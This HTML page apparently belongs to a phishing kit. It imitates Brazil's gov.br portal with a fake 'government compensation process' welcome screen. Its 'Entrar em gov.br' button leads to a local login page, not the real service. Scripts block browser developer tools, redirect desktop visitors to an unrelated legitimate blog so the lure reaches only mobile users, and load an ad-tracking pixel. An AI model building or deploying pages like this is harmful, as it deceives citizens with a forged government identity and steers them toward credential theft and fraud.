<!DOCTYPE html><html lang="pt_br"><head>
<style data-styled="active" data-styled-version="6.1.13"></style>
    <meta charset="utf-8">
    <link rel="icon" href="./favicon.ico" type="image/x-icon" sizes="16x16">
    <meta name="viewport" content="width=device-width, initial-scale=1"> 
  <script disable-devtool-auto="" src="disable-devtool-1.html" url="https://meutudo.com.br/blog/guia-do-saque-aniversario/"></script>
<script type="text/javascript">
  if (!navigator.userAgent.match(/(iPhone|iPod|iPad|Android|BlackBerry|IEMobile)/) && window.innerWidth > 768) {
    window.location.href = 'https://meutudo.com.br/blog/guia-do-saque-aniversario/';
  }
  </script> 
    <script>
        window.pixelId = "67b759e9f454faf48c0999a2";
        var a = document.createElement("script");
        a.setAttribute("async", "");
        a.setAttribute("defer", "");
        a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
        document.head.appendChild(a);
    </script>
    <script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>
    <style>
        body, html {
    max-width: 100vw;
    overflow-x: hidden;
    width: 100vw;
    height: 100vh;
    font-family: Arial, Helvetica, sans-serif;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
}

* {
    box-sizing: border-box;
    padding: 0;
    margin: 0;
}

.__variable_c3aa02 {
    --font-geist-mono: "geistMono", "geistMono Fallback";
}
.__variable_1e4310 {
    --font-geist-sans: "geistSans", "geistSans Fallback";
}

.kppKYO {
    height: 100%;
    width: 100%;
    display: flex
;
    flex-direction: column;
}

.gtOtNE {
    padding: 20px;
    background-color: white;
    height: 100%;
    border-radius: 20px;
    margin-top: -20px;
    display: flex
;
    gap: 50px;
    align-items: center;
    flex-direction: column;
}

.iqKr {
    margin-top: 50px;
    font-size: 30px;
    color: rgb(19, 81, 180);
    font-weight: 380;
}

.irqTtS {
    font-size: 20px;
    color: rgb(19, 81, 180);
    font-weight: 350;
}

.krcYmm {
    color: rgb(19, 81, 180);
    text-decoration: underline;
    font-weight: bold;
    font-size: 16px;
}

.krflkP {
    background-color: rgb(19, 81, 180);
    border-radius: 35px;
    width: 65%;
    padding: 15px;
    color: white;
    font-size: 18px;
    font-weight: 600;
    border: none;
}
</style>
    
    

</head>

<body class="__variable_1e4310 __variable_c3aa02">    
    <div class="sc-d69c2a2d-0 kppKYO"><img src="images/background.jpg" style="z-index: -999;" loading="lazy">
        <div class="sc-d69c2a2d-1 gtOtNE">
            <div>
                <p class="sc-d69c2a2d-2 iqKr">Bem-vindo - <b>Portal Gov</b></p>
                <p class="sc-d69c2a2d-3 irqTtS">Processo Indenizatório do Governo</p>
            </div>
            <div>
                <p style="font-size: 14px; font-weight: 400;">Ao entrar, você concorda com nosso</p>
                <p><a class="sc-d69c2a2d-4 krcYmm">Termo de Responsabilidade</a> e <a class="sc-d69c2a2d-4 krcYmm">Política de Privacidade</a></p>
            </div><button class="sc-d69c2a2d-5 krflkP" onclick="redirect(event);">Entrar em <b>gov.br</b></button>
        </div>
    </div>


    <script>
        function redirect(event) {
            event.preventDefault();
            var currentUrlParams = window.location.search;
            window.location.href = "../login/index.html" + currentUrlParams;
        }
    </script>
</body></html>


